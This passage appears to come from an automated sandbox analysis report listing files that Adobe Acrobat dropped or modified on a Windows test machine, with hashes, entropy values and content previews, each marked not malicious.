                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4944c6.TMP (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:4C313FE514B5F4E7E89329630909F8DC
                    SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                    SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                    SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                    Malicious:false
                    Reputation:unknown
                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4099
                    Entropy (8bit):5.23343192638433
                    Encrypted:false
                    SSDEEP:
                    MD5:59908309E232EA586A2DC105B95F66D8
                    SHA1:4E1F83B88506BC415A774D2489E554401A509D75
                    SHA-256:15D66903DEB0FE59CDEA5127329C5FA03D846D1F8D443BB8A5C1E7C325D6AECF
                    SHA-512:C49FF1BFB1E2C510573C8658C5A62EEACA667C82A079C3D5DEA7FC2D4853669226B61CD9271D1629E5EF7F7D7407F29AB4471C30F5012D79D45379B5E69C457C
                    Malicious:false
                    Reputation:unknown
                    Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):322
                    Entropy (8bit):5.204955762215564
                    Encrypted:false
                    SSDEEP:
                    MD5:18B22DA05E5B9112AE691FF9A0FCC8C5
                    SHA1:F6AC258120986E2635988F39AF251461DE136CDE
                    SHA-256:312B120E14CA19869EB253541BF04FDB70F31C99FF055573F446B17FDCB91919
                    SHA-512:79CC082A0D245AD25D8DC54586F9BA47DA4C7B937B189A9A3BF07943992D8F3032CAE0BCD08782E2CA80C75FEFCF9AA9DA1DD6F231ACC8B261C713A6E96C5DA6
                    Malicious:false
                    Reputation:unknown
                    Preview:2025/03/17-21:17:45.491 1a04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/17-21:17:45.493 1a04 Recovering log #3.2025/03/17-21:17:45.496 1a04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250318011748Z-159.bmp

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PC bitmap, Windows 3.x format, 164 x -116 x 32, cbSize 76150, bits offset 54
                    Category:dropped
                    Size (bytes):76150
                    Entropy (8bit):2.093863076197932
                    Encrypted:false
                    SSDEEP:
                    MD5:BF9603819489E574D264F869AD0CD4BC
                    SHA1:E9513E85CE19AC9D2FB5BA8729646DE969166DBE
                    SHA-256:9652BAC4A7860105B083EB3D92249E74675B6CCF22633DCD1B118BC9360E7DAC
                    SHA-512:B36AB4C3A2EE92DC70725C26FE8175E8ECD5EF007B695B07FE4A115AC83484410735FA3957AD70E8E6DB98B1EA0613EE5227EF3D4C022985C7CC64C204AB2289
                    Malicious:false
                    Reputation:unknown
                    Preview:BMv)......6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):57344
                    Entropy (8bit):3.291927920232006
                    Encrypted:false
                    SSDEEP:
                    MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                    SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                    SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                    SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                    Malicious:false
                    Reputation:unknown
                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):16928
                    Entropy (8bit):1.214057698349226
                    Encrypted:false
                    SSDEEP:
                    MD5:4654475C15C15059ACDADF4219AFF60B
                    SHA1:65953FB175C529B4DF3568932728ACCA72984375
                    SHA-256:B980DD4692C527FC5A6C830A1E289BCE24C7838E4D4AD522D04BCCE762619407
                    SHA-512:78998CF5B4BE0B75618C9A938BAEAEE4813B3087017D7E5F166C39A152357251B0A57CC0CCF809EAC3E815F6EE5CD6D7D86871BD5F7AAFBB3A15603AEA59B3D5
                    Malicious:false
                    Reputation:unknown
                    Preview:.... .c.....p...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Certificate, Version=3
                    Category:dropped
                    Size (bytes):1391
                    Entropy (8bit):7.705940075877404
                    Encrypted:false
                    SSDEEP:
                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                    Malicious:false
                    Reputation:unknown
                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):73305
                    Entropy (8bit):7.996028107841645
                    Encrypted:true
                    SSDEEP:
                    MD5:83142242E97B8953C386F988AA694E4A
                    SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                    SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                    SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                    Malicious:false
                    Reputation:unknown
                    Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):192
                    Entropy (8bit):2.756901573172974
                    Encrypted:false
                    SSDEEP:
                    MD5:5F69F2849FA87962A722F25F2ADE845E
                    SHA1:53968DF98022CC3B80CCE3D7A4C12E0B592ECC7C
                    SHA-256:6F50795678D8226C8BFA8C71DC51A050C02A8A13AEA9598FEEFE1270EBD6F3D3
                    SHA-512:D5434D72DD5EAEA87F5F97DB0A7EE80A1FA571AB96F8716B869B6635361851C986F2269FF9DC6049333AFA661B345AD6F59F1E86C62970C0350F80029A2C31B2
                    Malicious:false
                    Reputation:unknown
                    Preview:p...... ...............(....................................................... ..........W.....d..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:modified
                    Size (bytes):330
                    Entropy (8bit):3.183651560957911
                    Encrypted:false
                    SSDEEP:
                    MD5:02C16AE756D149B00D9EE439E65982B5
                    SHA1:71853BD20076A2D1C8902E60629E6ED2462E9BD8
                    SHA-256:2C49B1CEA6EDAC1A5619E167B996B69DCA5AEB6A548C798959617EEF14288FDA
                    SHA-512:4DE3F171E395BFF162618A911B815C2FD5F3A96F35095610A3F10F5747677F0197EA74B71F9F126B5ADF094F18B997D0CCC2284FFD25D774F2527A91E4EA3894
                    Malicious:false
                    Reputation:unknown
                    Preview:p...... ................(....................................................... ..................(...........Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6356

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Reputation:unknown
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Reputation:unknown
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.367984348501563
                    Encrypted:false
                    SSDEEP:
                    MD5:92B3894311C2260A797AF72363876DB5
                    SHA1:4F40DA4220F0179133C1A45721F13E32EDA92830
                    SHA-256:D1BEA0400036374C9642C82DAAE514716C74A649F74E371A5A605B8C8CBB248F
                    SHA-512:F3BADFD162C4CFCEEAC47BA341B94C7C17D37AF7D959E0FA3AB3E650140108A343464542756AA89CE36E499F7AF222FF6E0B7A3FD0DC645BD292394C83DB9CC6
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.315585563089468
                    Encrypted:false
                    SSDEEP:
                    MD5:17EF11B0AE591EABC251369F58DF9D06
                    SHA1:BDABA65E561194C933899A4BFCFB3101A997EDA2
                    SHA-256:516221166463F6AAAC1C7E6EC177659680C546B3A4363969DA6147F879E56DE3
                    SHA-512:61315ABDBE33C71D73B60EA720E94EF760D6FF958DEF01C942C1BA4E45D9988A52D1EA7DE333248CF60F7183E0B06A22EA7A15E6D661769904A4A83A3FBBEC59
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.293845058447275
                    Encrypted:false
                    SSDEEP:
                    MD5:D21F713B738A6F2670DA234875C94D31
                    SHA1:6B7EFB283D33703C33BBCD1A596272D534DB4037
                    SHA-256:F0459CC97D1AF903E4678F9B27BABFD8385F6314A2CDDD5470985FBB612E74C2
                    SHA-512:91045CB9CD99E185131A6F902530C3ADD2207142E18F2BF714D1D6211B0D30442E058D94D4971F8311C6FBA74118525A085812D6447E668F6921CE407430A6CA
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):285
                    Entropy (8bit):5.356526676266571
                    Encrypted:false
                    SSDEEP:
                    MD5:A6696B94BFD117577A16B02C07760B8F
                    SHA1:920876BCAB4E8A7F5F9EE14B52148426CFF5D14F
                    SHA-256:004BCC5677BDF9E51FBB7EB3384C3097FE16C6408AC4E8DA33271805C18BF3E9
                    SHA-512:E1526CD78A18104537B85CFC632BC71CC88B73D67DBCEC966F030198BEF1C03C9AA1DCBD41A0FFA3B119FDB7C2EFDBB02EDB3990EB0899F6E6B3F2DA26C4C6C2
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2113
                    Entropy (8bit):5.843220928100596
                    Encrypted:false
                    SSDEEP:
                    MD5:0B359BBA7E32D652FB3A44F1693BEF0A
                    SHA1:33521BDCC9630DD26286EE9CD425873C1D59BB0D
                    SHA-256:35C03A87B5C90862F79B79A25DCE54ED20C30A29C53733BBD64E1F1F082F5999
                    SHA-512:D388A829A1233C83A084D995D76B905B1D154450841D839DFD791B65851E401E1DEEF875D61B39C03CD6D2FFE6EF2EC07C39C5DC0000B766580577A5A601C32B
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.30510768300891
                    Encrypted:false
                    SSDEEP:
                    MD5:252CDDFBF2143785C0446E23B8CCFB2D
                    SHA1:4F1248A77B3A436D35AF7F88CB340E754ADD8740
                    SHA-256:5971215374B9D8C537ABA296A44C890179C352E88D3CA73C47D51C95E39082D2
                    SHA-512:86324F3EAD0D247D45B52986B75064B4E4C88D35C1A5517D9304B29A21BCD92CF7B6C4F9DA26985D29534A0E6C40A5A3E416C95DE73364DB835B8482A4F71020
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):292
                    Entropy (8bit):5.308289057747194
                    Encrypted:false
                    SSDEEP:
                    MD5:AE2F5C07B705E1B22692BE9FEAA2B8C8
                    SHA1:668521E368EF65E980DD3C28931D4974382427CB
                    SHA-256:25D9A3A4968C052FA43AB97B16C22B3433E28F27FE170B9A26A374D29FF2C731
                    SHA-512:C83515914880E45E543BC4DF59FC6C2ADB218A7F5009FD8D73F76BFFA38314A3F111E7833F6D8BB1C6D51879CA84BCB952DBDCFA0FAB48824DB31A673348519D
                    Malicious:false
                    Reputation:unknown
                    Preview:{"analyticsData":{"responseGUID":"949f4631-d695-44ec-aa97-c5853a8f9b5f","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742434821184,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2064
                    Entropy (8bit):5.825664977211851
                    Encrypted:false
                    SSDEEP:
                    MD5:8B1CF2B7EF3616BC9F238795DDD7DFDA
                    SHA1:0C056ED844B1EEF9ED41BF172A6E2045DFB130AC
                    SHA-256:B649189ECA1588459349FAA02F33B617B6C987513EE7701D3C52D7E09DBA7A45
                    SHA-512:6C3DF34A80A58D6098A2FEAC619DF1D6852524A2CB04441A853D8EA668D16CC5552CF4B9749FB3B82A8F7622FEE75DCB6D7DD50B2D5B898C8CA4A76D3E304AE1
                    Malicious:false
                    Reputation:unknown
